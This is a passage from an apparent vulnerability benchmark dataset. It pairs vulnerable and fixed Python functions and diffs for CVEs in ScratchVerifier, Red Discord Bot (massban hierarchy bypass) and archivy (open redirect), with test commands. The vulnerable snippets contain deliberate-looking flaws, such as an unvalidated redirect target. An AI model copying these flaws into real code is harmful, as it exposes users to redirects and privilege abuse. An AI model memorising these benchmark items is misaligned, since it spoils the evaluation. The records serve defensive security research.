login.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/ScratchVerifier/ScratchVerifier", "patch_url": ["https://github.com/ScratchVerifier/ScratchVerifier/commit/a603769010abf8c1bede91af46e4945314e4aa4a"], "programing_language": "Python", "vul_func": [{"id": "vul_py_379_1", "commit": "2170fc56a64aeb40a0936702a9c3281f716c6405", "file_path": "backend/db.py", "start_line": 160, "end_line": 185, "snippet": " async def start_verification(self, client_id, username):\n async with self.lock:\n await self.db.execute('SELECT code FROM scratchverifier_usage WHERE \\\nclient_id=? AND username=?', (client_id, username))\n row = await self.db.fetchone()\n if row is not None:\n await self.db.execute('UPDATE scratchverifier_usage SET expiry=? \\\nWHERE client_id=? AND username=? AND code=?', (int(time.time()) + VERIFY_EXPIRY,\n client_id, username, row[0]))\n return row[0]\n code = sha256(\n str(client_id).encode()\n + str(time.time()).encode()\n + username.encode()\n + token_bytes()\n # 0->A, 1->B, etc, to avoid Scratch's phone number censor\n ).hexdigest().translate({ord('0') + i: ord('A') + i for i in range(10)})\n await self.db.execute('INSERT INTO scratchverifier_usage (client_id, \\\ncode, username, expiry) VALUES (?, ?, ?, ?)', (client_id, code, username,\n int(time.time() + VERIFY_EXPIRY)))\n await self.db.execute('INSERT INTO scratchverifier_logs (client_id, \\\nusername, log_time, log_type) VALUES (?, ?, ?, ?)', (client_id, username,\n int(time.time()), 1))\n await self.db.execute('DELETE FROM scratchverifier_usage WHERE \\\nexpiry<=?', (int(time.time()),))\n return code"}], "fix_func": [{"id": "fix_py_379_1", "commit": "a603769010abf8c1bede91af46e4945314e4aa4a", "file_path": "backend/db.py", "start_line": 160, "end_line": 186, "snippet": " async def start_verification(self, client_id, username):\n async with self.lock:\n await self.db.execute('SELECT code FROM scratchverifier_usage WHERE \\\nclient_id=? 
AND username=?', (client_id, username))\n row = await self.db.fetchone()\n code = sha256(\n str(client_id).encode()\n + str(time.time()).encode()\n + username.encode()\n + token_bytes()\n # 0->A, 1->B, etc, to avoid Scratch's phone number censor\n ).hexdigest().translate({ord('0') + i: ord('A') + i for i in range(10)})\n if row is not None:\n await self.db.execute(\n 'UPDATE scratchverifier_usage SET expiry=?, code=? \\\nWHERE client_id=? AND username=?', (int(time.time()) + VERIFY_EXPIRY,\n code, client_id, username))\n return code\n await self.db.execute('INSERT INTO scratchverifier_usage (client_id, \\\ncode, username, expiry) VALUES (?, ?, ?, ?)', (client_id, code, username,\n int(time.time() + VERIFY_EXPIRY)))\n await self.db.execute('INSERT INTO scratchverifier_logs (client_id, \\\nusername, log_time, log_type) VALUES (?, ?, ?, ?)', (client_id, username,\n int(time.time()), 1))\n await self.db.execute('DELETE FROM scratchverifier_usage WHERE \\\nexpiry<=?', (int(time.time()),))\n return code"}], "vul_patch": "--- a/backend/db.py\n+++ b/backend/db.py\n@@ -3,11 +3,6 @@\n await self.db.execute('SELECT code FROM scratchverifier_usage WHERE \\\n client_id=? AND username=?', (client_id, username))\n row = await self.db.fetchone()\n- if row is not None:\n- await self.db.execute('UPDATE scratchverifier_usage SET expiry=? \\\n-WHERE client_id=? AND username=? AND code=?', (int(time.time()) + VERIFY_EXPIRY,\n- client_id, username, row[0]))\n- return row[0]\n code = sha256(\n str(client_id).encode()\n + str(time.time()).encode()\n@@ -15,6 +10,12 @@\n + token_bytes()\n # 0->A, 1->B, etc, to avoid Scratch's phone number censor\n ).hexdigest().translate({ord('0') + i: ord('A') + i for i in range(10)})\n+ if row is not None:\n+ await self.db.execute(\n+ 'UPDATE scratchverifier_usage SET expiry=?, code=? \\\n+WHERE client_id=? AND username=?', (int(time.time()) + VERIFY_EXPIRY,\n+ code, client_id, username))\n+ return code\n await self.db.execute('INSERT INTO scratchverifier_usage (client_id, \\\n code, username, expiry) VALUES (?, ?, ?, ?)', (client_id, code, username,\n int(time.time() + VERIFY_EXPIRY)))\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-15278", "cve_description": "Red Discord Bot before version 3.4.1 has an unauthorized privilege escalation exploit in the Mod module. This exploit allows Discord users with a high privilege level within the guild to bypass hierarchy checks when the application is in a specific condition that is beyond that user's control. By abusing this exploit, it is possible to perform destructive actions within the guild the user has high privileges in. This exploit has been fixed in version 3.4.1. As a workaround, unloading the Mod module with unload mod or, disabling the massban command with command disable global massban can render this exploit not accessible. 
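The ScratchVerifier record above closes a race by changing when the code is minted: pre-patch, a second `start_verification()` for the same user returned the already-pending code, so an attacker who started a parallel login shared the victim's code. The patched version derives a fresh code on every call and only then decides whether to UPDATE the pending row or INSERT a new one, so concurrent attempts invalidate each other. A sketch of that code derivation, following the recipe in the record's own snippet:

```python
import time
from hashlib import sha256
from secrets import token_bytes

def fresh_verification_code(client_id: int, username: str) -> str:
    """Derive a new, unpredictable code for every login attempt.

    Hashing in token_bytes() makes each call's output independent, so
    returning a cached pending code is never necessary or possible.
    """
    digest = sha256(
        str(client_id).encode()
        + str(time.time()).encode()
        + username.encode()
        + token_bytes()
    ).hexdigest()
    # 0->A, 1->B, ... to dodge Scratch's phone-number censor, as in the record
    return digest.translate({ord("0") + i: ord("A") + i for i in range(10)})
```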
We still highly recommend updating to 3.4.1 to completely patch this issue.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-863": {"name": "Incorrect Authorization", "description": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/Cog-Creators/Red-DiscordBot", "patch_url": ["https://github.com/Cog-Creators/Red-DiscordBot/commit/726bfd38adfdfaef760412a68e01447b470f438b"], "programing_language": "Python", "vul_func": [{"id": "vul_py_62_1", "commit": "21f9a6f", "file_path": "redbot/cogs/mod/kickban.py", "start_line": 369, "end_line": 514, "snippet": " async def massban(\n self,\n ctx: commands.Context,\n user_ids: commands.Greedy[RawUserIds],\n days: Optional[int] = None,\n *,\n reason: str = None,\n ):\n \"\"\"Mass bans user(s) from the server.\n\n User IDs need to be provided in order to ban\n using this command.\"\"\"\n banned = []\n errors = {}\n upgrades = []\n\n async def show_results():\n text = _(\"Banned {num} users from the server.\").format(\n num=humanize_number(len(banned))\n )\n if errors:\n text += _(\"\\nErrors:\\n\")\n text += \"\\n\".join(errors.values())\n if upgrades:\n text += _(\n \"\\nFollowing user IDs have been upgraded from a temporary to a permanent ban:\\n\"\n )\n text += humanize_list(upgrades)\n\n for p in pagify(text):\n await ctx.send(p)\n\n def remove_processed(ids):\n return [_id for _id in ids if _id not in banned and _id not in errors]\n\n user_ids = list(set(user_ids)) # No dupes\n\n author = ctx.author\n guild = ctx.guild\n\n if not user_ids:\n await ctx.send_help()\n return\n\n if days is None:\n days = await self.config.guild(guild).default_days()\n\n if not (0 <= days <= 7):\n await ctx.send(_(\"Invalid days. Must be between 0 and 7.\"))\n return\n\n if not guild.me.guild_permissions.ban_members:\n return await ctx.send(_(\"I lack the permissions to do this.\"))\n\n tempbans = await self.config.guild(guild).current_tempbans()\n\n ban_list = await guild.bans()\n for entry in ban_list:\n for user_id in user_ids:\n if entry.user.id == user_id:\n if user_id in tempbans:\n # We need to check if a user is tempbanned here because otherwise they won't be processed later on.\n continue\n else:\n errors[user_id] = _(\"User with ID {user_id} is already banned.\").format(\n user_id=user_id\n )\n\n user_ids = remove_processed(user_ids)\n\n if not user_ids:\n await show_results()\n return\n\n for user_id in user_ids:\n user = guild.get_member(user_id)\n if user is not None:\n if user_id in tempbans:\n # We need to check if a user is tempbanned here because otherwise they won't be processed later on.\n continue\n else:\n # Instead of replicating all that handling... 
gets attr from decorator\n try:\n success, reason = await self.ban_user(\n user=user, ctx=ctx, days=days, reason=reason, create_modlog_case=True\n )\n if success:\n banned.append(user_id)\n else:\n errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n user_id=user_id, reason=reason\n )\n except Exception as e:\n errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n user_id=user_id, reason=e\n )\n\n user_ids = remove_processed(user_ids)\n\n if not user_ids:\n await show_results()\n return\n\n for user_id in user_ids:\n user = discord.Object(id=user_id)\n audit_reason = get_audit_reason(author, reason)\n queue_entry = (guild.id, user_id)\n async with self.config.guild(guild).current_tempbans() as tempbans:\n if user_id in tempbans:\n tempbans.remove(user_id)\n upgrades.append(str(user_id))\n log.info(\n \"{}({}) upgraded the tempban for {} to a permaban.\".format(\n author.name, author.id, user_id\n )\n )\n banned.append(user_id)\n else:\n try:\n await guild.ban(user, reason=audit_reason, delete_message_days=days)\n log.info(\"{}({}) hackbanned {}\".format(author.name, author.id, user_id))\n except discord.NotFound:\n errors[user_id] = _(\"User with ID {user_id} not found\").format(\n user_id=user_id\n )\n continue\n except discord.Forbidden:\n errors[user_id] = _(\n \"Could not ban user with ID {user_id}: missing permissions.\"\n ).format(user_id=user_id)\n continue\n else:\n banned.append(user_id)\n\n await modlog.create_case(\n self.bot,\n guild,\n ctx.message.created_at.replace(tzinfo=timezone.utc),\n \"hackban\",\n user_id,\n author,\n reason,\n until=None,\n channel=None,\n )\n await show_results()"}], "fix_func": [{"id": "fix_py_62_1", "commit": "726bfd38adfdfaef760412a68e01447b470f438b", "file_path": "redbot/cogs/mod/kickban.py", "start_line": 369, "end_line": 527, "snippet": " async def massban(\n self,\n ctx: commands.Context,\n user_ids: commands.Greedy[RawUserIds],\n days: Optional[int] = None,\n *,\n reason: str = None,\n ):\n \"\"\"Mass bans user(s) from the server.\n\n User IDs need to be provided in order to ban\n using this command.\"\"\"\n banned = []\n errors = {}\n upgrades = []\n\n async def show_results():\n text = _(\"Banned {num} users from the server.\").format(\n num=humanize_number(len(banned))\n )\n if errors:\n text += _(\"\\nErrors:\\n\")\n text += \"\\n\".join(errors.values())\n if upgrades:\n text += _(\n \"\\nFollowing user IDs have been upgraded from a temporary to a permanent ban:\\n\"\n )\n text += humanize_list(upgrades)\n\n for p in pagify(text):\n await ctx.send(p)\n\n def remove_processed(ids):\n return [_id for _id in ids if _id not in banned and _id not in errors]\n\n user_ids = list(set(user_ids)) # No dupes\n\n author = ctx.author\n guild = ctx.guild\n\n if not user_ids:\n await ctx.send_help()\n return\n\n if days is None:\n days = await self.config.guild(guild).default_days()\n\n if not (0 <= days <= 7):\n await ctx.send(_(\"Invalid days. 
Must be between 0 and 7.\"))\n return\n\n if not guild.me.guild_permissions.ban_members:\n return await ctx.send(_(\"I lack the permissions to do this.\"))\n\n tempbans = await self.config.guild(guild).current_tempbans()\n\n ban_list = await guild.bans()\n for entry in ban_list:\n for user_id in user_ids:\n if entry.user.id == user_id:\n if user_id in tempbans:\n # We need to check if a user is tempbanned here because otherwise they won't be processed later on.\n continue\n else:\n errors[user_id] = _(\"User with ID {user_id} is already banned.\").format(\n user_id=user_id\n )\n\n user_ids = remove_processed(user_ids)\n\n if not user_ids:\n await show_results()\n return\n\n # We need to check here, if any of the users isn't a member and if they are,\n # we need to use our `ban_user()` method to do hierarchy checks.\n members: Dict[int, discord.Member] = {}\n to_query: List[int] = []\n\n for user_id in user_ids:\n member = guild.get_member(user_id)\n if member is not None:\n members[user_id] = member\n elif not guild.chunked:\n to_query.append(user_id)\n\n # If guild isn't chunked, we might possibly be missing the member from cache,\n # so we need to make sure that isn't the case by querying the user IDs for such guilds.\n while to_query:\n queried_members = await guild.query_members(user_ids=to_query[:100], limit=100)\n members.update((member.id, member) for member in queried_members)\n to_query = to_query[100:]\n\n # Call `ban_user()` method for all users that turned out to be guild members.\n for member in members:\n try:\n success, reason = await self.ban_user(\n user=member, ctx=ctx, days=days, reason=reason, create_modlog_case=True\n )\n if success:\n banned.append(user_id)\n else:\n errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n user_id=user_id, reason=reason\n )\n except Exception as e:\n errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n user_id=user_id, reason=e\n )\n\n user_ids = remove_processed(user_ids)\n\n if not user_ids:\n await show_results()\n return\n\n for user_id in user_ids:\n user = discord.Object(id=user_id)\n audit_reason = get_audit_reason(author, reason)\n queue_entry = (guild.id, user_id)\n async with self.config.guild(guild).current_tempbans() as tempbans:\n if user_id in tempbans:\n tempbans.remove(user_id)\n upgrades.append(str(user_id))\n log.info(\n \"{}({}) upgraded the tempban for {} to a permaban.\".format(\n author.name, author.id, user_id\n )\n )\n banned.append(user_id)\n else:\n try:\n await guild.ban(user, reason=audit_reason, delete_message_days=days)\n log.info(\"{}({}) hackbanned {}\".format(author.name, author.id, user_id))\n except discord.NotFound:\n errors[user_id] = _(\"User with ID {user_id} not found\").format(\n user_id=user_id\n )\n continue\n except discord.Forbidden:\n errors[user_id] = _(\n \"Could not ban user with ID {user_id}: missing permissions.\"\n ).format(user_id=user_id)\n continue\n else:\n banned.append(user_id)\n\n await modlog.create_case(\n self.bot,\n guild,\n ctx.message.created_at.replace(tzinfo=timezone.utc),\n \"hackban\",\n user_id,\n author,\n reason,\n until=None,\n channel=None,\n )\n await show_results()"}], "vul_patch": "--- a/redbot/cogs/mod/kickban.py\n+++ b/redbot/cogs/mod/kickban.py\n@@ -72,28 +72,41 @@\n await show_results()\n return\n \n+ # We need to check here, if any of the users isn't a member and if they are,\n+ # we need to use our `ban_user()` method to do hierarchy checks.\n+ members: Dict[int, discord.Member] = {}\n+ to_query: List[int] = []\n+\n 
for user_id in user_ids:\n- user = guild.get_member(user_id)\n- if user is not None:\n- if user_id in tempbans:\n- # We need to check if a user is tempbanned here because otherwise they won't be processed later on.\n- continue\n+ member = guild.get_member(user_id)\n+ if member is not None:\n+ members[user_id] = member\n+ elif not guild.chunked:\n+ to_query.append(user_id)\n+\n+ # If guild isn't chunked, we might possibly be missing the member from cache,\n+ # so we need to make sure that isn't the case by querying the user IDs for such guilds.\n+ while to_query:\n+ queried_members = await guild.query_members(user_ids=to_query[:100], limit=100)\n+ members.update((member.id, member) for member in queried_members)\n+ to_query = to_query[100:]\n+\n+ # Call `ban_user()` method for all users that turned out to be guild members.\n+ for member in members:\n+ try:\n+ success, reason = await self.ban_user(\n+ user=member, ctx=ctx, days=days, reason=reason, create_modlog_case=True\n+ )\n+ if success:\n+ banned.append(user_id)\n else:\n- # Instead of replicating all that handling... gets attr from decorator\n- try:\n- success, reason = await self.ban_user(\n- user=user, ctx=ctx, days=days, reason=reason, create_modlog_case=True\n- )\n- if success:\n- banned.append(user_id)\n- else:\n- errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n- user_id=user_id, reason=reason\n- )\n- except Exception as e:\n- errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n- user_id=user_id, reason=e\n- )\n+ errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n+ user_id=user_id, reason=reason\n+ )\n+ except Exception as e:\n+ errors[user_id] = _(\"Failed to ban user {user_id}: {reason}\").format(\n+ user_id=user_id, reason=e\n+ )\n \n user_ids = remove_processed(user_ids)\n \n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-15278:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/Red-DiscordBot\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2020-15278/bin/python hand_test.py\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2020-15278:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/Red-DiscordBot\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2020-15278/bin/python -m pytest tests/cogs/ -v -k \"not test_git_get_full_sha1_from_ambiguous_tag_and_commit and not test_git_get_full_sha1_from_ambiguous_commits\" --asyncio-mode=auto"} {"cve_id": "CVE-2022-0697", "cve_description": "Open Redirect in GitHub repository archivy/archivy prior to 1.7.0.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/archivy/archivy", "patch_url": ["https://github.com/archivy/archivy/commit/2d8cb29853190d42572b36deb61127e68d6be574"], "programing_language": "Python", "vul_func": [{"id": "vul_py_319_1", "commit": "fa389e7", "file_path": "archivy/routes.py", "start_line": "41", "end_line": "271", "snippet": "@app.before_request\ndef check_perms():\n allowed_path = (\n request.path.startswith(\"/login\")\n or request.path.startswith(\"/static\")\n or request.path.startswith(\"/api/login\")\n )\n if not current_user.is_authenticated and not allowed_path:\n return redirect(url_for(\"login\", next=request.path))\n 
return\n\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n path = request.args.get(\"path\", \"\").lstrip(\"/\")\n try:\n files = data.get_items(path=path)\n except FileNotFoundError:\n flash(\"Directory does not exist.\", \"error\")\n return redirect(\"/\")\n\n return render_template(\n \"home.html\",\n title=path or \"root\",\n search_enabled=app.config[\"SEARCH_CONF\"][\"enabled\"],\n dir=files,\n current_path=path,\n new_folder_form=forms.NewFolderForm(),\n delete_form=forms.DeleteFolderForm(),\n rename_form=forms.RenameDirectoryForm(),\n view_only=0,\n search_engine=app.config[\"SEARCH_CONF\"][\"engine\"],\n )\n\n\n# TODO: refactor two following methods\n@app.route(\"/bookmarks/new\", methods=[\"GET\", \"POST\"])\ndef new_bookmark():\n default_dir = app.config.get(\"DEFAULT_BOOKMARKS_DIR\", \"root directory\")\n form = forms.NewBookmarkForm(path=default_dir)\n form.path.choices = [(\"\", \"root directory\")] + [\n (pathname, pathname) for pathname in data.get_dirs()\n ]\n if form.validate_on_submit():\n path = form.path.data\n tags = form.tags.data.split(\",\") if form.tags.data != \"\" else []\n tags = [tag.strip() for tag in tags]\n bookmark = DataObj(url=form.url.data, tags=tags, path=path, type=\"bookmark\")\n bookmark.process_bookmark_url()\n bookmark_id = bookmark.insert()\n if bookmark_id:\n flash(\"Bookmark Saved!\", \"success\")\n return redirect(f\"/dataobj/{bookmark_id}\")\n else:\n flash(bookmark.error, \"error\")\n return redirect(\"/bookmarks/new\")\n # for bookmarklet\n form.url.data = request.args.get(\"url\", \"\")\n path = request.args.get(\"path\", default_dir).strip(\"/\")\n # handle empty argument\n form.path.data = path\n return render_template(\"dataobjs/new.html\", title=\"New Bookmark\", form=form)\n\n\n@app.route(\"/notes/new\", methods=[\"GET\", \"POST\"])\ndef new_note():\n form = forms.NewNoteForm()\n default_dir = \"root directory\"\n form.path.choices = [(\"\", default_dir)] + [\n (pathname, pathname) for pathname in data.get_dirs()\n ]\n if form.validate_on_submit():\n path = form.path.data\n tags = form.tags.data.split(\",\") if form.tags.data != \"\" else []\n tags = [tag.strip() for tag in tags]\n note = DataObj(title=form.title.data, path=path, tags=tags, type=\"note\")\n note_id = note.insert()\n if note_id:\n flash(\"Note Saved!\", \"success\")\n return redirect(f\"/dataobj/{note_id}\")\n path = request.args.get(\"path\", default_dir).strip(\"/\")\n # handle empty argument\n form.path.data = path\n return render_template(\"/dataobjs/new.html\", title=\"New Note\", form=form)\n\n\n@app.route(\"/tags\")\ndef show_all_tags():\n if not app.config[\"SEARCH_CONF\"][\"engine\"] == \"ripgrep\" and not which(\"rg\"):\n flash(\"Ripgrep must be installed to view pages about embedded tags.\", \"error\")\n return redirect(\"/\")\n tags = sorted(get_all_tags(force=True))\n return render_template(\"tags/all.html\", title=\"All Tags\", tags=tags)\n\n\n@app.route(\"/tags/\")\ndef show_tag(tag_name):\n if not app.config[\"SEARCH_CONF\"][\"enabled\"] and not which(\"rg\"):\n flash(\n \"Search (for example ripgrep) must be installed to view pages about embedded tags.\",\n \"error\",\n )\n return redirect(\"/\")\n\n results = search(f\"#{tag_name}#\", strict=True)\n res_ids = set(\n [item[\"id\"] for item in results]\n ) # avoid duplication of results between context-aware embedded tags and metadata ones\n for res in search_frontmatter_tags(tag_name):\n if res[\"id\"] not in res_ids:\n results.append(res)\n\n return render_template(\n \"tags/show.html\",\n 
title=f\"Tags - {tag_name}\",\n tag_name=tag_name,\n search_result=results,\n )\n\n\n@app.route(\"/dataobj/\")\ndef show_dataobj(dataobj_id):\n dataobj = data.get_item(dataobj_id)\n get_title_id_pairs = lambda x: (x[\"title\"], x[\"id\"])\n titles = list(\n map(get_title_id_pairs, data.get_items(structured=False, load_content=False))\n )\n\n if not dataobj:\n flash(\"Data could not be found!\", \"error\")\n return redirect(\"/\")\n\n if request.args.get(\"raw\") == \"1\":\n return frontmatter.dumps(dataobj)\n\n backlinks = []\n if app.config[\"SEARCH_CONF\"][\"enabled\"]:\n if app.config[\"SEARCH_CONF\"][\"engine\"] == \"ripgrep\":\n query = f\"\\|{dataobj_id}]]\"\n else:\n query = f\"|{dataobj_id})]]\"\n backlinks = search(query, strict=True)\n\n # Form for moving data into another folder\n move_form = forms.MoveItemForm()\n move_form.path.choices = [(\"\", \"root directory\")] + [\n (pathname, pathname) for pathname in data.get_dirs()\n ]\n\n post_title_form = forms.TitleForm()\n post_title_form.title.data = dataobj[\"title\"]\n\n # Get all tags\n tag_list = get_all_tags()\n # and the ones present in this dataobj\n embedded_tags = set()\n PATTERN = r\"(?:^|\\n| )#(?:[-_a-zA-Z\\u00c0-\\u00d6\\u00d8-\\u00f6\\u00f8-\\u00ff0-9]+)#\"\n for match in re.finditer(PATTERN, dataobj.content):\n embedded_tags.add(match.group(0).replace(\"#\", \"\").lstrip())\n\n return render_template(\n \"dataobjs/show.html\",\n title=dataobj[\"title\"],\n dataobj=dataobj,\n backlinks=backlinks,\n current_path=dataobj[\"dir\"],\n form=forms.DeleteDataForm(),\n view_only=0,\n search_enabled=app.config[\"SEARCH_CONF\"][\"enabled\"],\n post_title_form=post_title_form,\n move_form=move_form,\n tag_list=tag_list,\n embedded_tags=embedded_tags,\n titles=titles,\n )\n\n\n@app.route(\"/dataobj/move/\", methods=[\"POST\"])\ndef move_item(dataobj_id):\n form = forms.MoveItemForm()\n out_dir = form.path.data if form.path.data != \"\" else \"root directory\"\n if form.path.data == None:\n flash(\"No path specified.\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n try:\n if data.move_item(dataobj_id, form.path.data):\n flash(f\"Data successfully moved to {out_dir}.\", \"success\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n else:\n flash(f\"Data could not be moved to {out_dir}.\", \"error\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n except FileNotFoundError:\n flash(\"Data not found.\", \"error\")\n return redirect(\"/\")\n except FileExistsError:\n flash(\"Data already in target directory.\", \"error\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n\n\n@app.route(\"/dataobj/delete/\", methods=[\"POST\"])\ndef delete_data(dataobj_id):\n try:\n data.delete_item(dataobj_id)\n except BaseException:\n flash(\"Data could not be found!\", \"error\")\n return redirect(\"/\")\n flash(\"Data deleted!\", \"success\")\n return redirect(\"/\")\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = forms.UserForm()\n if form.validate_on_submit():\n db = get_db()\n user = db.search(\n (Query().username == form.username.data) & (Query().type == \"user\")\n )\n\n if user and check_password_hash(user[0][\"hashed_password\"], form.password.data):\n user = User.from_db(user[0])\n login_user(user, remember=True)\n flash(\"Login successful!\", \"success\")\n\n next_url = request.args.get(\"next\")\n return redirect(next_url or \"/\")\n\n flash(\"Invalid credentials\", \"error\")\n return redirect(\"/login\")\n return render_template(\"users/login.html\", form=form, title=\"Login\")"}], "fix_func": [{"id": 
"fix_py_319_1", "commit": "2d8cb29", "file_path": "archivy/routes.py", "start_line": "41", "end_line": "274", "snippet": "@app.before_request\ndef check_perms():\n allowed_path = (\n request.path.startswith(\"/login\")\n or request.path.startswith(\"/static\")\n or request.path.startswith(\"/api/login\")\n )\n if not current_user.is_authenticated and not allowed_path:\n return redirect(url_for(\"login\", next=request.path))\n return\n\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n path = request.args.get(\"path\", \"\").lstrip(\"/\")\n try:\n files = data.get_items(path=path)\n except FileNotFoundError:\n flash(\"Directory does not exist.\", \"error\")\n return redirect(\"/\")\n\n return render_template(\n \"home.html\",\n title=path or \"root\",\n search_enabled=app.config[\"SEARCH_CONF\"][\"enabled\"],\n dir=files,\n current_path=path,\n new_folder_form=forms.NewFolderForm(),\n delete_form=forms.DeleteFolderForm(),\n rename_form=forms.RenameDirectoryForm(),\n view_only=0,\n search_engine=app.config[\"SEARCH_CONF\"][\"engine\"],\n )\n\n\n# TODO: refactor two following methods\n@app.route(\"/bookmarks/new\", methods=[\"GET\", \"POST\"])\ndef new_bookmark():\n default_dir = app.config.get(\"DEFAULT_BOOKMARKS_DIR\", \"root directory\")\n form = forms.NewBookmarkForm(path=default_dir)\n form.path.choices = [(\"\", \"root directory\")] + [\n (pathname, pathname) for pathname in data.get_dirs()\n ]\n if form.validate_on_submit():\n path = form.path.data\n tags = form.tags.data.split(\",\") if form.tags.data != \"\" else []\n tags = [tag.strip() for tag in tags]\n bookmark = DataObj(url=form.url.data, tags=tags, path=path, type=\"bookmark\")\n bookmark.process_bookmark_url()\n bookmark_id = bookmark.insert()\n if bookmark_id:\n flash(\"Bookmark Saved!\", \"success\")\n return redirect(f\"/dataobj/{bookmark_id}\")\n else:\n flash(bookmark.error, \"error\")\n return redirect(\"/bookmarks/new\")\n # for bookmarklet\n form.url.data = request.args.get(\"url\", \"\")\n path = request.args.get(\"path\", default_dir).strip(\"/\")\n # handle empty argument\n form.path.data = path\n return render_template(\"dataobjs/new.html\", title=\"New Bookmark\", form=form)\n\n\n@app.route(\"/notes/new\", methods=[\"GET\", \"POST\"])\ndef new_note():\n form = forms.NewNoteForm()\n default_dir = \"root directory\"\n form.path.choices = [(\"\", default_dir)] + [\n (pathname, pathname) for pathname in data.get_dirs()\n ]\n if form.validate_on_submit():\n path = form.path.data\n tags = form.tags.data.split(\",\") if form.tags.data != \"\" else []\n tags = [tag.strip() for tag in tags]\n note = DataObj(title=form.title.data, path=path, tags=tags, type=\"note\")\n note_id = note.insert()\n if note_id:\n flash(\"Note Saved!\", \"success\")\n return redirect(f\"/dataobj/{note_id}\")\n path = request.args.get(\"path\", default_dir).strip(\"/\")\n # handle empty argument\n form.path.data = path\n return render_template(\"/dataobjs/new.html\", title=\"New Note\", form=form)\n\n\n@app.route(\"/tags\")\ndef show_all_tags():\n if not app.config[\"SEARCH_CONF\"][\"engine\"] == \"ripgrep\" and not which(\"rg\"):\n flash(\"Ripgrep must be installed to view pages about embedded tags.\", \"error\")\n return redirect(\"/\")\n tags = sorted(get_all_tags(force=True))\n return render_template(\"tags/all.html\", title=\"All Tags\", tags=tags)\n\n\n@app.route(\"/tags/\")\ndef show_tag(tag_name):\n if not app.config[\"SEARCH_CONF\"][\"enabled\"] and not which(\"rg\"):\n flash(\n \"Search (for example ripgrep) must be installed 
to view pages about embedded tags.\",\n \"error\",\n )\n return redirect(\"/\")\n\n results = search(f\"#{tag_name}#\", strict=True)\n res_ids = set(\n [item[\"id\"] for item in results]\n ) # avoid duplication of results between context-aware embedded tags and metadata ones\n for res in search_frontmatter_tags(tag_name):\n if res[\"id\"] not in res_ids:\n results.append(res)\n\n return render_template(\n \"tags/show.html\",\n title=f\"Tags - {tag_name}\",\n tag_name=tag_name,\n search_result=results,\n )\n\n\n@app.route(\"/dataobj/\")\ndef show_dataobj(dataobj_id):\n dataobj = data.get_item(dataobj_id)\n get_title_id_pairs = lambda x: (x[\"title\"], x[\"id\"])\n titles = list(\n map(get_title_id_pairs, data.get_items(structured=False, load_content=False))\n )\n\n if not dataobj:\n flash(\"Data could not be found!\", \"error\")\n return redirect(\"/\")\n\n if request.args.get(\"raw\") == \"1\":\n return frontmatter.dumps(dataobj)\n\n backlinks = []\n if app.config[\"SEARCH_CONF\"][\"enabled\"]:\n if app.config[\"SEARCH_CONF\"][\"engine\"] == \"ripgrep\":\n query = f\"\\|{dataobj_id}]]\"\n else:\n query = f\"|{dataobj_id})]]\"\n backlinks = search(query, strict=True)\n\n # Form for moving data into another folder\n move_form = forms.MoveItemForm()\n move_form.path.choices = [(\"\", \"root directory\")] + [\n (pathname, pathname) for pathname in data.get_dirs()\n ]\n\n post_title_form = forms.TitleForm()\n post_title_form.title.data = dataobj[\"title\"]\n\n # Get all tags\n tag_list = get_all_tags()\n # and the ones present in this dataobj\n embedded_tags = set()\n PATTERN = r\"(?:^|\\n| )#(?:[-_a-zA-Z\\u00c0-\\u00d6\\u00d8-\\u00f6\\u00f8-\\u00ff0-9]+)#\"\n for match in re.finditer(PATTERN, dataobj.content):\n embedded_tags.add(match.group(0).replace(\"#\", \"\").lstrip())\n\n return render_template(\n \"dataobjs/show.html\",\n title=dataobj[\"title\"],\n dataobj=dataobj,\n backlinks=backlinks,\n current_path=dataobj[\"dir\"],\n form=forms.DeleteDataForm(),\n view_only=0,\n search_enabled=app.config[\"SEARCH_CONF\"][\"enabled\"],\n post_title_form=post_title_form,\n move_form=move_form,\n tag_list=tag_list,\n embedded_tags=embedded_tags,\n titles=titles,\n )\n\n\n@app.route(\"/dataobj/move/\", methods=[\"POST\"])\ndef move_item(dataobj_id):\n form = forms.MoveItemForm()\n out_dir = form.path.data if form.path.data != \"\" else \"root directory\"\n if form.path.data == None:\n flash(\"No path specified.\")\n return redirect(f\"/dataobj/{dataobj_id}\")\n try:\n if data.move_item(dataobj_id, form.path.data):\n flash(f\"Data successfully moved to {out_dir}.\", \"success\")\n 